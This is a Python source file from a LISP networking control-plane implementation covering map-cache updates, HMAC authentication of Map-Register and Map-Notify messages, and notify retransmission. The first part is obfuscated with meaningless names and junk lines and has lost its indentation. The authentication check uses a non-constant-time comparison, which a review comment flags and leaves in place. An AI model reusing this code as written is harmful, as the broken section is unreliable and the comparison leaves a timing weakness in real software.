if 61 - 61: OoO0O00 . I1IiiI
o00Oo00o0oO0 = None
if ( IiiiiII1i ) : o00Oo00o0oO0 = IiiiiII1i . get_rloc ( iIii1IiIiI . rloc )
if ( o00Oo00o0oO0 ) :
oOo00O = o00Oo00o0oO0
else :
oOo00O = lisp_rloc ( )
if 65 - 65: OoooooooOO / Oo0Ooo
if 91 - 91: iIii1I11I1II1 / i11iIiiIii + i11iIiiIii / OOooOOo / i1IIi
if 20 - 20: OOooOOo % O0 * Oo0Ooo . II111iiii
if 82 - 82: OoO0O00
if 54 - 54: i1IIi * OOooOOo - oO0o * OoooooooOO + II111iiii . IiII
if 90 - 90: O0 - II111iiii + I1IiiI . iII111i
if 3 - 3: o0oOOo0O0Ooo + i1IIi * Oo0Ooo
IiI1iI1 = oOo00O . store_rloc_from_record ( iIii1IiIiI , IiIIIi . nonce ,
source )
oOo00O . echo_nonce_capable = IiIIIi . echo_nonce_capable
if 6 - 6: OoO0O00 * OoooooooOO * iIii1I11I1II1
if ( oOo00O . echo_nonce_capable ) :
oo0o00OO = oOo00O . rloc . print_address_no_iid ( )
if ( lisp_get_echo_nonce ( None , oo0o00OO ) == None ) :
lisp_echo_nonce ( oo0o00OO )
if 87 - 87: iIii1I11I1II1 - ooOoO0o * iIii1I11I1II1
if 79 - 79: ooOoO0o . oO0o + Ii1I * ooOoO0o + O0 . II111iiii
if 8 - 8: IiII * OOooOOo + I11i + O0 * oO0o - oO0o
if 19 - 19: OoO0O00 - ooOoO0o + I1ii11iIi11i / I1ii11iIi11i % I1Ii111 % iIii1I11I1II1
if 5 - 5: OoooooooOO + ooOoO0o - II111iiii . i11iIiiIii / oO0o - ooOoO0o
if 3 - 3: iII111i
if 74 - 74: i11iIiiIii + OoooooooOO . OOooOOo
if 29 - 29: IiII % OoO0O00
if 53 - 53: OoooooooOO - OoOoOO00 / IiII - I1Ii111
if 16 - 16: iIii1I11I1II1 / OOooOOo + I1IiiI * II111iiii . OOooOOo
if ( IiIIIi . rloc_probe and iIii1IiIiI . probe_bit ) :
if ( oOo00O . rloc . afi == source . afi ) :
lisp_process_rloc_probe_reply ( oOo00O . rloc , source , IiI1iI1 ,
IiIIIi . nonce , IiIIIi . hop_count , ttl )
if 68 - 68: IiII * IiII + oO0o / o0oOOo0O0Ooo
if 41 - 41: OoOoOO00 - O0
if 48 - 48: OoooooooOO % Ii1I * OoO0O00 / I1ii11iIi11i
if 53 - 53: ooOoO0o + oO0o - II111iiii
if 92 - 92: Oo0Ooo - I11i . ooOoO0o % oO0o
if 6 - 6: iIii1I11I1II1 + oO0o
ooo0oo . append ( oOo00O )
if 8 - 8: I1ii11iIi11i + o0oOOo0O0Ooo
if 29 - 29: Ii1I . OOooOOo
if 59 - 59: O0 . OoO0O00
if 10 - 10: I1Ii111 / OoooooooOO / OoO0O00 * ooOoO0o
if ( lisp_data_plane_security and oOo00O . rloc_recent_rekey ( ) ) :
ooiIi1 = oOo00O
if 81 - 81: i1IIi % I11i * iIii1I11I1II1
if 39 - 39: iIii1I11I1II1 / O0 . OoooooooOO - O0 . OoO0O00 . oO0o
if 59 - 59: II111iiii * I1IiiI
if 12 - 12: i11iIiiIii - IiII . iII111i . Ii1I
if 34 - 34: i1IIi % iII111i + Oo0Ooo * OoOoOO00 + OoO0O00
if 37 - 37: I1Ii111 / OoooooooOO
if 19 - 19: Ii1I - O0 + I1IiiI + OoooooooOO + ooOoO0o - Oo0Ooo
if 45 - 45: I1IiiI . OoOoOO00 . OoOoOO00
if 20 - 20: OoOoOO00
if 69 - 69: OoOoOO00 * Ii1I % ooOoO0o . OoOoOO00 / oO0o * I1Ii111
if 93 - 93: OoO0O00 % IiII % ooOoO0o . I1IiiI
if ( IiIIIi . rloc_probe == False and lisp_nat_traversal ) :
I1III = [ ]
o0oo0 = [ ]
for oOo00O in ooo0oo :
if 32 - 32: OoO0O00 / I1Ii111 / I1Ii111
if 45 - 45: iII111i + O0 % i11iIiiIii * I1ii11iIi11i + I1Ii111 / OOooOOo
if 55 - 55: OoooooooOO % iIii1I11I1II1 . ooOoO0o
if 10 - 10: O0 * iIii1I11I1II1 . OOooOOo
if 4 - 4: iIii1I11I1II1
if ( oOo00O . rloc . is_private_address ( ) ) :
oOo00O . priority = 1
oOo00O . state = LISP_RLOC_UNREACH_STATE
I1III . append ( oOo00O )
o0oo0 . append ( oOo00O . rloc . print_address_no_iid ( ) )
continue
if 22 - 22: ooOoO0o . oO0o
if 65 - 65: i1IIi . I1ii11iIi11i / Oo0Ooo
if 84 - 84: I1ii11iIi11i . OOooOOo
if 86 - 86: II111iiii * Oo0Ooo . IiII . iII111i + II111iiii . iIii1I11I1II1
if 88 - 88: OoooooooOO % ooOoO0o
if 71 - 71: II111iiii * I1IiiI * Oo0Ooo / II111iiii + iIii1I11I1II1 % i1IIi
if ( oOo00O . priority == 254 and lisp_i_am_rtr == False ) :
I1III . append ( oOo00O )
o0oo0 . append ( oOo00O . rloc . print_address_no_iid ( ) )
if 85 - 85: IiII * O0 . I1Ii111 . II111iiii
if ( oOo00O . priority != 254 and lisp_i_am_rtr ) :
I1III . append ( oOo00O )
o0oo0 . append ( oOo00O . rloc . print_address_no_iid ( ) )
if 6 - 6: I1ii11iIi11i * oO0o + iIii1I11I1II1 + II111iiii
if 69 - 69: iII111i . OoO0O00 + I1IiiI
if 77 - 77: Ii1I * II111iiii
if ( o0oo0 != [ ] ) :
ooo0oo = I1III
lprint ( "NAT-traversal optimized RLOC-set: {}" . format ( o0oo0 ) )
if 80 - 80: i11iIiiIii
if 33 - 33: OOooOOo . ooOoO0o / iIii1I11I1II1 * OOooOOo / oO0o
if 75 - 75: Ii1I - OoOoOO00 . OOooOOo - o0oOOo0O0Ooo - I1ii11iIi11i
if 69 - 69: O0 % I1ii11iIi11i
if 77 - 77: iIii1I11I1II1 . OOooOOo
if 64 - 64: OoOoOO00 - i1IIi * i1IIi / iII111i * OoOoOO00 * OoO0O00
if 61 - 61: OOooOOo
I1III = [ ]
for oOo00O in ooo0oo :
if ( oOo00O . json != None ) : continue
I1III . append ( oOo00O )
if 51 - 51: Oo0Ooo * OOooOOo / iII111i
if ( I1III != [ ] ) :
OO = len ( ooo0oo ) - len ( I1III )
lprint ( "Pruning {} no-address RLOC-records for map-cache" . format ( OO ) )
if 49 - 49: ooOoO0o . i1IIi % I1Ii111 . I1IiiI . I1ii11iIi11i + OoO0O00
ooo0oo = I1III
if 65 - 65: I1ii11iIi11i + Ii1I / i11iIiiIii * I1Ii111 + OoooooooOO
if 7 - 7: Oo0Ooo % o0oOOo0O0Ooo
if 40 - 40: oO0o * IiII
if 29 - 29: O0 - II111iiii + iII111i
if 73 - 73: I1Ii111 - I11i + IiII - o0oOOo0O0Ooo - I11i - OOooOOo
if 40 - 40: iIii1I11I1II1 . iII111i * I1ii11iIi11i + IiII - iIii1I11I1II1
if 83 - 83: i1IIi
if 9 - 9: iIii1I11I1II1 + i11iIiiIii
if ( IiIIIi . rloc_probe and IiiiiII1i != None ) : ooo0oo = IiiiiII1i . rloc_set
if 70 - 70: I1IiiI - OoO0O00 % OOooOOo + ooOoO0o % II111iiii
if 19 - 19: I11i + i1IIi / i1IIi - II111iiii + I1Ii111
if 11 - 11: i11iIiiIii % i11iIiiIii / IiII - Oo0Ooo / O0 - I11i
if 29 - 29: OOooOOo * iIii1I11I1II1 * ooOoO0o
if 80 - 80: oO0o * I1Ii111
O00OO0 = o0O0o0oooo00
if ( IiiiiII1i and ooo0oo != IiiiiII1i . rloc_set ) :
IiiiiII1i . delete_rlocs_from_rloc_probe_list ( )
O00OO0 = True
if 61 - 61: OoooooooOO % I1ii11iIi11i / OoOoOO00
if 23 - 23: ooOoO0o . O0 % O0 - iIii1I11I1II1 / IiII
if 8 - 8: i11iIiiIii . Oo0Ooo / i11iIiiIii % IiII
if 41 - 41: iII111i * I11i % OoooooooOO * iIii1I11I1II1
if 73 - 73: I1Ii111 * I1ii11iIi11i
O00o0 = IiiiiII1i . uptime if ( IiiiiII1i ) else None
if ( IiiiiII1i == None ) :
IiiiiII1i = lisp_mapping ( iiI . eid , iiI . group , ooo0oo )
IiiiiII1i . mapping_source = source
if 77 - 77: iII111i / OoOoOO00 . ooOoO0o * I1ii11iIi11i
if 44 - 44: OoooooooOO + ooOoO0o / I1Ii111 + I1ii11iIi11i
if 15 - 15: oO0o - i1IIi % iIii1I11I1II1 . i1IIi
if 93 - 93: I11i / Ii1I - o0oOOo0O0Ooo % oO0o / OoO0O00 * I11i
if 24 - 24: i1IIi
if 21 - 21: II111iiii
if ( lisp_i_am_rtr and iiI . group . is_null ( ) == False ) :
IiiiiII1i . map_cache_ttl = LISP_MCAST_TTL
else :
IiiiiII1i . map_cache_ttl = iiI . store_ttl ( )
if 27 - 27: I1IiiI * i11iIiiIii
IiiiiII1i . action = iiI . action
IiiiiII1i . add_cache ( O00OO0 )
if 86 - 86: I1IiiI . Oo0Ooo / o0oOOo0O0Ooo - i1IIi . I11i / OOooOOo
if 78 - 78: I1ii11iIi11i
I1i1 = "Add"
if ( O00o0 ) :
IiiiiII1i . uptime = O00o0
IiiiiII1i . refresh_time = lisp_get_timestamp ( )
I1i1 = "Replace"
if 73 - 73: I1ii11iIi11i + OoooooooOO - OoOoOO00 + Oo0Ooo
if 47 - 47: II111iiii + iII111i / i1IIi * Ii1I . OoO0O00 + IiII
lprint ( "{} {} map-cache with {} RLOCs" . format ( I1i1 ,
green ( IiiiiII1i . print_eid_tuple ( ) , False ) , len ( ooo0oo ) ) )
if 7 - 7: i1IIi % O0 * ooOoO0o - OOooOOo % ooOoO0o * I1ii11iIi11i
if 34 - 34: OoOoOO00 - I11i
if 85 - 85: OoOoOO00 . oO0o
if 98 - 98: I1Ii111
if 49 - 49: OoO0O00 / I1ii11iIi11i % IiII * II111iiii
if ( lisp_ipc_dp_socket and ooiIi1 != None ) :
lisp_write_ipc_keys ( ooiIi1 )
if 92 - 92: iIii1I11I1II1 . OoooooooOO . ooOoO0o / II111iiii
if 30 - 30: i1IIi * Ii1I + Ii1I / I1Ii111
if 84 - 84: I1IiiI - Oo0Ooo * OoO0O00 * oO0o
if 13 - 13: I1Ii111 * i11iIiiIii % o0oOOo0O0Ooo + oO0o - iII111i
if 32 - 32: I1Ii111 / I1ii11iIi11i - Ii1I % o0oOOo0O0Ooo * I1Ii111 % II111iiii
if 33 - 33: ooOoO0o % I11i
if 72 - 72: OoO0O00 % OoooooooOO / II111iiii * oO0o * I1Ii111
if ( o0O0o0oooo00 ) :
OOO0oOooOOo00 = bold ( "RLOC-probe" , False )
for oOo00O in IiiiiII1i . best_rloc_set :
oo0o00OO = red ( oOo00O . rloc . print_address_no_iid ( ) , False )
lprint ( "Trigger {} to {}" . format ( OOO0oOooOOo00 , oo0o00OO ) )
lisp_send_map_request ( lisp_sockets , 0 , IiiiiII1i . eid , IiiiiII1i . group , oOo00O )
if 4 - 4: IiII . O0 * I1IiiI * O0 - i11iIiiIii - O0
if 26 - 26: Oo0Ooo * i11iIiiIii - i11iIiiIii . i11iIiiIii / I11i
if 26 - 26: Oo0Ooo - II111iiii % ooOoO0o
return
if 81 - 81: i11iIiiIii + I1ii11iIi11i * oO0o
if 86 - 86: OoO0O00 . ooOoO0o . o0oOOo0O0Ooo
if 70 - 70: O0 % OoooooooOO - Ii1I * Oo0Ooo
if 18 - 18: OOooOOo . I1IiiI + i1IIi . I1IiiI
if 3 - 3: O0 * O0 + II111iiii + OoOoOO00 * I11i % Oo0Ooo
if 19 - 19: oO0o % IiII % OoooooooOO % I1ii11iIi11i / OoO0O00
if 6 - 6: O0 * I1Ii111 - II111iiii
if 60 - 60: oO0o % oO0o
def lisp_compute_auth(packet, map_register, password):
    """
    Compute the authentication data for a Map-Register and encode it
    into the packet. Returns the packet unchanged when no auth
    algorithm is configured on the Map-Register.
    """
    if map_register.alg_id == LISP_NONE_ALG_ID:
        return packet

    # The hash is computed over the packet with the auth field zeroed.
    zeroed = map_register.zero_auth(packet)
    auth_hash = lisp_hash_me(zeroed, map_register.alg_id, password, False)

    # Stash the raw digest and splice it back into the packet.
    map_register.auth_data = auth_hash
    return map_register.encode_auth(zeroed)
if 98 - 98: II111iiii - iII111i % i11iIiiIii + ooOoO0o
if 76 - 76: OOooOOo - iII111i + IiII
if 48 - 48: I1IiiI - II111iiii
if 15 - 15: O0
if 54 - 54: iIii1I11I1II1
if 54 - 54: iII111i + OOooOOo + OoO0O00
if 6 - 6: oO0o - OoooooooOO * iIii1I11I1II1 * I1ii11iIi11i
def lisp_hash_me(packet, alg_id, password, do_hex):
    """
    HMAC `packet` with `password`, using the hash function selected by
    `alg_id` (SHA-1 or SHA-256). Returns the hex string when `do_hex`
    is True, otherwise the raw digest. Returns True when `alg_id` is
    LISP_NONE_ALG_ID (no authentication in use).
    """
    if alg_id == LISP_NONE_ALG_ID:
        return True

    # NOTE(review): if alg_id matches neither SHA constant, hash_alg is
    # unbound and hmac.new() raises NameError — same as the original.
    if alg_id == LISP_SHA_1_96_ALG_ID:
        hash_alg = hashlib.sha1
    if alg_id == LISP_SHA_256_128_ALG_ID:
        hash_alg = hashlib.sha256

    mac = hmac.new(password, packet, hash_alg)
    return mac.hexdigest() if do_hex else mac.digest()
if 63 - 63: II111iiii * II111iiii % I1IiiI
if 34 - 34: I1Ii111 + OOooOOo * iII111i / ooOoO0o % i11iIiiIii
if 91 - 91: IiII * Ii1I * OOooOOo
if 17 - 17: o0oOOo0O0Ooo + Ii1I % I1ii11iIi11i + IiII % I1Ii111 + I1ii11iIi11i
if 100 - 100: I11i * OoO0O00 - i1IIi + iII111i * Ii1I - OoooooooOO
if 47 - 47: o0oOOo0O0Ooo / Ii1I - iII111i * OOooOOo / i11iIiiIii
if 97 - 97: iIii1I11I1II1 + OoOoOO00 + OoOoOO00 * o0oOOo0O0Ooo
if 14 - 14: II111iiii + I1ii11iIi11i * Oo0Ooo
def lisp_verify_auth(packet, alg_id, auth_data, password):
    """
    Verify the authentication data carried in a received packet against
    a locally computed hash. Returns True on match (or when no auth
    algorithm is in use), False otherwise.
    """
    if alg_id == LISP_NONE_ALG_ID:
        return True

    computed = lisp_hash_me(packet, alg_id, password, True)
    # NOTE(review): '==' is not a constant-time comparison; a move to
    # hmac.compare_digest() would harden this against timing attacks —
    # left as-is to preserve behavior for mismatched operand types.
    matched = (computed == auth_data)

    if not matched:
        lprint("Hashed value: {} does not match packet value: {}".format(
            computed, auth_data))
    return matched
if 83 - 83: OoOoOO00 / OOooOOo * II111iiii * OoooooooOO
if 51 - 51: OoOoOO00 + o0oOOo0O0Ooo / Ii1I
if 6 - 6: I11i % IiII
if 48 - 48: Ii1I
if 100 - 100: OoO0O00 % I1Ii111 + OoooooooOO / OoO0O00
if 62 - 62: IiII
if 66 - 66: o0oOOo0O0Ooo % OOooOOo
def lisp_retransmit_map_notify(map_notify):
    """
    Timer callback: resend an unacknowledged Map-Notify to its ETR.
    Once the retry limit is reached, cancel the timer and remove the
    message from the retransmit queue instead.
    """
    etr = map_notify.etr
    port = map_notify.etr_port

    if map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES:
        lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}".format(
            map_notify.nonce_key, red(etr.print_address(), False)))

        queue_key = map_notify.nonce_key
        if queue_key in lisp_map_notify_queue:
            map_notify.retransmit_timer.cancel()
            lprint("Dequeue Map-Notify from retransmit queue, key is: {}".format(
                queue_key))
            try:
                lisp_map_notify_queue.pop(queue_key)
            except:
                lprint("Key not found in Map-Notify queue")
        return

    sockets = map_notify.lisp_sockets
    map_notify.retry_count += 1

    lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format(
        bold("Map-Notify", False), map_notify.nonce_key,
        red(etr.print_address(), False), map_notify.retry_count))

    lisp_send_map_notify(sockets, map_notify.packet, etr, port)
    if map_notify.site:
        map_notify.site.map_notifies_sent += 1

    # Re-arm the timer for the next retry.
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
if 28 - 28: ooOoO0o % OoO0O00 - II111iiii * IiII - I1IiiI + I1IiiI
if 84 - 84: IiII / Ii1I
if 39 - 39: OOooOOo - iIii1I11I1II1 + OoOoOO00 % IiII * OoooooooOO % Ii1I
if 11 - 11: I1ii11iIi11i
if 83 - 83: O0
if 97 - 97: O0
if 50 - 50: I1Ii111 / OoooooooOO . o0oOOo0O0Ooo + I1IiiI * i11iIiiIii
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
                                eid_record):
    """
    Send a Map-Notify carrying the merged RLOC-set of `parent` to every
    ETR that registered the EID-prefix. Each notify is authenticated
    with the key the ETR registered with and queued for retransmission.
    """
    # Build the EID-record plus one RLOC-record per merged RLOC.
    eid_record.rloc_count = len(parent.registered_rlocs)
    record = eid_record.encode()
    eid_record.print_record("Merged Map-Notify ", False)

    for registered in parent.registered_rlocs:
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(registered)
        record += rloc_record.encode()
        rloc_record.print_record(" ")
        del(rloc_record)

    # Unicast an authenticated Map-Notify to each registering ETR.
    for registered in parent.registered_rlocs:
        etr = registered.rloc
        map_notify = lisp_map_notify(lisp_sockets)
        map_notify.record_count = 1
        key_id = map_register.key_id
        map_notify.key_id = key_id
        map_notify.alg_id = map_register.alg_id
        map_notify.auth_len = map_register.auth_len
        map_notify.nonce = map_register.nonce
        map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
        map_notify.etr.copy_address(etr)
        map_notify.etr_port = map_register.sport
        map_notify.site = parent.site
        packet = map_notify.encode(record, parent.site.auth_key[key_id])
        map_notify.print_notify()

        # Replace any Map-Notify already queued under the same nonce.
        key = map_notify.nonce_key
        if key in lisp_map_notify_queue:
            queued = lisp_map_notify_queue[key]
            queued.retransmit_timer.cancel()
            del(queued)
        lisp_map_notify_queue[key] = map_notify

        lprint("Send merged Map-Notify to ETR {}".format(
            red(etr.print_address(), False)))
        lisp_send(lisp_sockets, etr, LISP_CTRL_PORT, packet)
        parent.site.map_notifies_sent += 1

        # Arm retransmission until the ETR acks.
        map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
            lisp_retransmit_map_notify, [map_notify])
        map_notify.retransmit_timer.start()
    return
if 9 - 9: I11i
if 83 - 83: i11iIiiIii
if 72 - 72: oO0o + II111iiii . O0 * oO0o + iII111i
if 22 - 22: I11i + Ii1I . IiII - OoO0O00 - o0oOOo0O0Ooo
if 84 - 84: OoooooooOO - Oo0Ooo
if 86 - 86: O0 + OoO0O00 + O0 . I1IiiI
if 82 - 82: OoOoOO00
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
                          source, port, nonce, key_id, alg_id, auth_len, site,
                          map_register_ack):
    """
    Build and send a Map-Notify to `source` (an xTR), either to ack a
    Map-Register (map_register_ack True) or to announce an RLOC-set
    change. Non-ack notifies are queued and retransmitted until acked.

    Fixes vs. original: removed the dead self-assignment
    `key_id = key_id`; replaced Py2-only dict.has_key() with the `in`
    operator (behavior-identical).
    """
    key = lisp_hex_string(nonce) + source.print_address()

    # Drop any queued notifies for these EIDs; if one with this exact
    # nonce/source is still pending, let its retransmit cycle finish.
    lisp_remove_eid_from_map_notify_queue(eid_list)
    if key in lisp_map_notify_queue:
        map_notify = lisp_map_notify_queue[key]
        addr_str = red(source.print_address_no_iid(), False)
        lprint("Map-Notify with nonce 0x{} pending for xTR {}".format(
            lisp_hex_string(map_notify.nonce), addr_str))
        return

    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = record_count
    map_notify.key_id = key_id
    map_notify.alg_id = alg_id
    map_notify.auth_len = auth_len
    map_notify.nonce = nonce
    map_notify.nonce_key = lisp_hex_string(nonce)
    map_notify.etr.copy_address(source)
    map_notify.etr_port = port
    map_notify.site = site
    map_notify.eid_list = eid_list

    # Only RLOC-set-change notifies are retransmitted, so only those
    # go on the retransmit queue.
    if map_register_ack == False:
        key = map_notify.nonce_key
        lisp_map_notify_queue[key] = map_notify

    if map_register_ack:
        lprint("Send Map-Notify to ack Map-Register")
    else:
        lprint("Send Map-Notify for RLOC-set change")

    # Authenticate with the site's key for the requested key-id.
    packet = map_notify.encode(eid_records, site.auth_key[key_id])
    map_notify.print_notify()

    if map_register_ack == False:
        eid_record = lisp_eid_record()
        eid_record.decode(eid_records)
        eid_record.print_record(" ", False)

    lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
    site.map_notifies_sent += 1

    if map_register_ack:
        return

    # Start the retransmission timer for the unacked notify.
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
if 39 - 39: oO0o
if 49 - 49: I1IiiI * I1Ii111 . I1IiiI - II111iiii
if 57 - 57: oO0o + O0 - OoOoOO00
if 14 - 14: II111iiii + i11iIiiIii + Ii1I / o0oOOo0O0Ooo . OoO0O00
if 93 - 93: o0oOOo0O0Ooo + i1IIi
if 24 - 24: i1IIi
if 54 - 54: iIii1I11I1II1 - IiII + o0oOOo0O0Ooo + I1ii11iIi11i + IiII
if 99 - 99: Oo0Ooo
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
    """
    Turn the supplied Map-Notify into a Map-Notify-Ack, authenticate it
    with the Map-Server's password, and send it back to the Map-Server.
    """
    map_notify.map_notify_ack = True

    packet = map_notify.encode(eid_records, ms.password)
    map_notify.print_notify()

    dest = ms.map_server
    lprint("Send Map-Notify-Ack to {}".format(
        red(dest.print_address(), False)))
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return
if 69 - 69: Ii1I . iIii1I11I1II1 / Oo0Ooo * Oo0Ooo % IiII
if 5 - 5: OOooOOo - I1Ii111 + IiII
if 82 - 82: OOooOOo
if 26 - 26: ooOoO0o + OoooooooOO + ooOoO0o * I1Ii111
if 26 - 26: I1IiiI - OOooOOo
if 34 - 34: I1Ii111 % I1IiiI . OoOoOO00 / iII111i + ooOoO0o . i11iIiiIii
if 51 - 51: OoooooooOO * I1Ii111 * I11i - I1ii11iIi11i + I1Ii111
if 50 - 50: OoooooooOO * II111iiii
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
    """
    Send an unsolicited Map-Notify for a multicast (S,G) site-EID to a
    single xTR, carrying either the RTR RLOCs or the non-RTR RLOCs of
    the registered set, and queue it for retransmission.
    """
    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = 1
    map_notify.nonce = lisp_get_control_nonce()
    map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
    map_notify.etr.copy_address(xtr)
    map_notify.etr_port = LISP_CTRL_PORT
    map_notify.eid_list = eid_list
    key = map_notify.nonce_key

    # Dedup: if a notify for this nonce is already queued for this ITR,
    # let the pending one run its retransmit course.
    lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
    if key in lisp_map_notify_queue:
        map_notify = lisp_map_notify_queue[key]
        lprint("Map-Notify with nonce 0x{} pending for ITR {}".format(
            map_notify.nonce, red(xtr.print_address_no_iid(), False)))
        return

    lisp_map_notify_queue[key] = map_notify

    # Decide whether to advertise RTR RLOCs or native RLOCs: use RTRs
    # when the set has them, unless the target xTR is itself one.
    rtrs = site_eid.rtrs_in_rloc_set()
    if rtrs:
        if site_eid.is_rtr_in_rloc_set(xtr):
            rtrs = False

    # Count matching RLOCs (XOR keeps RTRs when rtrs is True, non-RTRs
    # otherwise) and encode the EID-record.
    eid_record = lisp_eid_record()
    eid_record.record_ttl = 1440
    eid_record.eid.copy_address(site_eid.eid)
    eid_record.group.copy_address(site_eid.group)
    eid_record.rloc_count = 0
    for rloc_entry in site_eid.registered_rlocs:
        if rtrs ^ rloc_entry.is_rtr():
            continue
        eid_record.rloc_count += 1
    packet = eid_record.encode()

    map_notify.print_notify()
    eid_record.print_record(" ", False)

    # Append the matching RLOC-records.
    for rloc_entry in site_eid.registered_rlocs:
        if rtrs ^ rloc_entry.is_rtr():
            continue
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(rloc_entry)
        packet += rloc_record.encode()
        rloc_record.print_record(" ")

    # Unsolicited notify: no authentication key.
    packet = map_notify.encode(packet, "")
    if packet == None:
        return

    lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)

    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
if 80 - 80: O0 % II111iiii / O0 . Oo0Ooo * OoOoOO00 + OOooOOo
if 47 - 47: Ii1I - Oo0Ooo * OoOoOO00
if 20 - 20: oO0o
if 48 - 48: I1IiiI % OoO0O00
if 33 - 33: Ii1I
if 73 - 73: Ii1I . IiII
if 43 - 43: I11i . IiII - iII111i * I1IiiI * iII111i
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
    """
    For each (eid, group) pair in `rle_list`, figure out which ITRs or
    RTRs need to learn the new (S,G) state and send each one a
    multicast Map-Notify via lisp_send_multicast_map_notify().
    """
    null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    for entry in rle_list:
        site_eid = lisp_site_eid_lookup(entry[0], entry[1], True)
        if site_eid == None:
            continue

        # No merged registration: collect RTR RLOCs from the individual
        # registrations, keyed by address to dedup.
        rloc_set = site_eid.registered_rlocs
        if len(rloc_set) == 0:
            rtr_by_addr = {}
            for indiv in site_eid.individual_registrations.values():
                for rloc_entry in indiv.registered_rlocs:
                    if rloc_entry.is_rtr() == False:
                        continue
                    rtr_by_addr[rloc_entry.rloc.print_address()] = rloc_entry
            rloc_set = rtr_by_addr.values()

        notify_targets = []
        notifying_rtrs = False
        if site_eid.eid.address == 0 and site_eid.eid.mask_len == 0:
            # (0/0, G) entry: notify the RLE nodes already registered.
            addr_strs = []
            rle_nodes = []
            if len(rloc_set) != 0 and rloc_set[0].rle != None:
                rle_nodes = rloc_set[0].rle.rle_nodes
            for node in rle_nodes:
                notify_targets.append(node.address)
                addr_strs.append(node.address.print_address_no_iid())
            lprint("Notify existing RLE-nodes {}".format(addr_strs))
        else:
            # Otherwise notify any RTRs found in the RLOC-set.
            for rloc_entry in rloc_set:
                if rloc_entry.is_rtr():
                    notify_targets.append(rloc_entry.rloc)

        # No RTRs/RLE nodes: fall back to the ITRs registered under the
        # unicast (source-only) site-EID.
        notifying_rtrs = (len(notify_targets) != 0)
        if notifying_rtrs == False:
            parent = lisp_site_eid_lookup(entry[0], null_group, False)
            if parent == None:
                continue
            for rloc_entry in parent.registered_rlocs:
                if rloc_entry.rloc.is_null():
                    continue
                notify_targets.append(rloc_entry.rloc)

        if len(notify_targets) == 0:
            lprint("No ITRs or RTRs found for {}, Map-Notify suppressed".format(
                green(site_eid.print_eid_tuple(), False)))
            continue

        # Fan out one Map-Notify per target, with a small pacing delay.
        for target in notify_targets:
            lprint("Build Map-Notify to {}TR {} for {}".format(
                "R" if notifying_rtrs else "x",
                red(target.print_address_no_iid(), False),
                green(site_eid.print_eid_tuple(), False)))

            elist = [site_eid.print_eid_tuple()]
            lisp_send_multicast_map_notify(lisp_sockets, site_eid, elist,
                target)
            time.sleep(.001)
    return
if 28 - 28: Ii1I + OoooooooOO * I11i * OoOoOO00 + OoO0O00
if 87 - 87: I1Ii111 / O0 % O0 * o0oOOo0O0Ooo / II111iiii
if 25 - 25: I1ii11iIi11i * ooOoO0o + I11i + iIii1I11I1II1 / iIii1I11I1II1
if 76 - 76: iII111i
if 85 - 85: I1ii11iIi11i + OOooOOo % i1IIi
if 13 - 13: OOooOOo + i11iIiiIii / OOooOOo . O0 . OoO0O00 - Ii1I
if 31 - 31: OoOoOO00 * o0oOOo0O0Ooo / O0 . iII111i / i11iIiiIii
if 22 - 22: I1IiiI . OoooooooOO * I1ii11iIi11i + i11iIiiIii - O0 + i11iIiiIii
def lisp_find_sig_in_rloc_set(packet, rloc_count):
    """
    Walk `rloc_count` RLOC-records in `packet` and return the first one
    whose JSON payload carries a "signature" key; None if no record
    holds a (parseable) signature.
    """
    for _ in range(rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        sig = rloc_record.json
        if sig == None:
            continue

        try:
            sig = json.loads(sig.json_string)
        except:
            lprint("Found corrupted JSON signature")
            continue

        if "signature" not in sig:
            continue
        return rloc_record
    return None
if 23 - 23: iIii1I11I1II1 + OoooooooOO + ooOoO0o . iII111i . Oo0Ooo - iIii1I11I1II1
if 25 - 25: O0 + I1IiiI % OOooOOo / Oo0Ooo . IiII / I1Ii111
if 84 - 84: ooOoO0o . O0 + I1IiiI * OoO0O00 - I1IiiI
if 24 - 24: Ii1I
if 23 - 23: Oo0Ooo * i1IIi / I1IiiI . I11i - I1ii11iIi11i . iIii1I11I1II1
if 15 - 15: O0 + o0oOOo0O0Ooo / oO0o
if 27 - 27: Ii1I * II111iiii / oO0o
if 99 - 99: I11i + ooOoO0o % I11i + O0 - Ii1I - I1Ii111
if 3 - 3: Oo0Ooo . I1IiiI
if 61 - 61: OoO0O00 - I1ii11iIi11i . Ii1I * i11iIiiIii
if 97 - 97: ooOoO0o
if 58 - 58: iII111i
if 47 - 47: II111iiii % Oo0Ooo . iIii1I11I1II1 . oO0o
if 52 - 52: I11i * I1IiiI % I11i - iII111i - Ii1I - OoooooooOO
if 15 - 15: iII111i
if 95 - 95: i11iIiiIii . Ii1I / II111iiii + II111iiii + Ii1I / I11i
if 72 - 72: I1Ii111 . I1Ii111 * O0 + I1ii11iIi11i / Oo0Ooo
